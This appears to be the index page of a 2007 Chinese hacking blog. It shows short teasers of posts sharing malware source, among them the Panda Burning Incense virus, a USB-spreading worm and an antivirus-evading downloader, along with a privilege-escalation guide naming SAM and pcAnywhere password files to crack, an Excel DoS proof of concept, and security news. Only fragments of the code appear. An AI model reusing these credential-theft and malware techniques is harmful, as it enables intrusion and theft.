MS07-002 EXCEL Malformed Palette Record
[ 2007年1月31日 ]
Tags:
"""
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
######
Author
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
######
Author
阅读全文 | 分类:矩阵毒刺 | 评论:0 | 引用:0 | 浏览:
网络黑客已成黑色产业链 四部委拟联手作战反击
[ 2007年1月30日 ]
Tags:
自去年以来,黑客攻击网站的行动此起彼伏,新网、万网、百度等均一度因此而中招。而利用DDoS方式的黑客攻击,更是曾令亚洲最大的机房——北京宜庄机房——陷入间歇性瘫痪。
“近一段时间,我们的很多分中心都接到了举报。”1月24日,国家计算机网络应急中心(CNCERT/CC)副总工程师杜跃进在电话中对记者表示,目前,利用分布式拒绝服务攻击(DDoS)干扰网络,甚至敲诈的事件愈演愈烈,“已经对正常的网络秩序造成严重影响”。
黑客产业链
“近一段时间,我们的很多分中心都接到了举报。”1月24日,国家计算机网络应急中心(CNCERT/CC)副总工程师杜跃进在电话中对记者表示,目前,利用分布式拒绝服务攻击(DDoS)干扰网络,甚至敲诈的事件愈演愈烈,“已经对正常的网络秩序造成严重影响”。
黑客产业链
阅读全文 | 分类:心情随笔 | 评论:0 | 引用:0 | 浏览:
熊猫烧香核心源码
[ 2007年1月28日 ]
Tags:
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
[转载]提权大法(整理)
[ 2007年1月25日 ]
Tags:
c: d: e:.....
C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:\Program Files\serv-uC:\WINNT\system32\config下它的SAM,破解密码
c:\winnt\system32\inetsrv\data是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:\Program Files\serv-uC:\WINNT\system32\config下它的SAM,破解密码
c:\winnt\system32\inetsrv\data是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
自己改好的检测设备改变消息的u盘传播者--源代码
[ 2007年1月20日 ]
Tags:
本代码只供研究,非法使用造成的一切法律后果与本人无关
程序代码:
#include <windows.h>
程序代码:
#include <windows.h>
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
无Dll插入进程,下载者VC源代码
[ 2007年1月20日 ]
Tags:
更新部份:
增加代码xor解密功能,以逃过杀毒软件.
生成MiNI下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可.
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
安全专家:2007将爆发黑客“世界大战”
[ 2007年1月7日 ]
Tags:
近日,有安全专家称国际黑客打算整合世界各地的黑暗力量在2007年的互联网上开辟新的战线,打一场“世界大战”。在我看来,广大用户倒不必过分担心,因为专家所说的“新的战线”,实际上在今年都已经出现了,而“世界大战”的说法也有些耸人听闻,因为黑客并不希望通过制造安全事件引起人们的注意,他们更喜欢“悄悄地进村,打枪地不要”的方式。
尽管说法有些夸张,但专家的意见还是值得我们重视。McAfee表示,功能强大的智能手机将在2007年面临安全挑战,针对IM系统的病毒也会继续作乱。这些设备和系统在2006年已经饱受恶意攻击的困扰。
趋势科技说,2007年,恶意软件肯定会利用MySpace等社交网络站点兴风作浪,对用户进行更有针对性的攻击。2006年已经出现了利用MySpace网站发动攻击的行为,例如网络钓鱼。一个Macromedia Flash电影文件能够把用户引诱到假冒的MySpace网站并且要求输入登录信息。这样,黑客就拥有了某人的用户名和口令,登录用户的账户并查看用户的电子邮件和网络日记。更严重的危害是,大多数用户无论登录什么账户(如银行账户、电子邮件和即时消息账户等)都是用相同的口令,因此黑客会用所掌握的信息对企业的敏感数据和个人的银行存款下手。
尽管说法有些夸张,但专家的意见还是值得我们重视。McAfee表示,功能强大的智能手机将在2007年面临安全挑战,针对IM系统的病毒也会继续作乱。这些设备和系统在2006年已经饱受恶意攻击的困扰。
趋势科技说,2007年,恶意软件肯定会利用MySpace等社交网络站点兴风作浪,对用户进行更有针对性的攻击。2006年已经出现了利用MySpace网站发动攻击的行为,例如网络钓鱼。一个Macromedia Flash电影文件能够把用户引诱到假冒的MySpace网站并且要求输入登录信息。这样,黑客就拥有了某人的用户名和口令,登录用户的账户并查看用户的电子邮件和网络日记。更严重的危害是,大多数用户无论登录什么账户(如银行账户、电子邮件和即时消息账户等)都是用相同的口令,因此黑客会用所掌握的信息对企业的敏感数据和个人的银行存款下手。
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
很幽默的讲解六种Socket I/O模型
[ 2007年1月7日 ]
Tags:
本文简单介绍了当前Windows支持的各种Socket I/O模型,如果你发现其中存在什么错误请务必赐教。
一:select模型
二:WSAAsyncSelect模型
三:WSAEventSelect模型
四:Overlapped I/O 事件通知模型
五:Overlapped I/O 完成例程模型
六:IOCP模型
老陈有一个在外地工作的女儿,不能经常回来,老陈和她通过信件联系。他们的信会被邮递员投递到他们的信箱里。
...
阅读全文 | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
腾讯QQ发现多个远程溢出漏洞,可完全控制对方计算机
[ 2007年1月7日 ]
Tags:
Tencent QQ 多个远程溢出漏洞
by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org
by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org
阅读全文 | 分类:资源共享 | 评论:0 | 引用:0 | 浏览:
|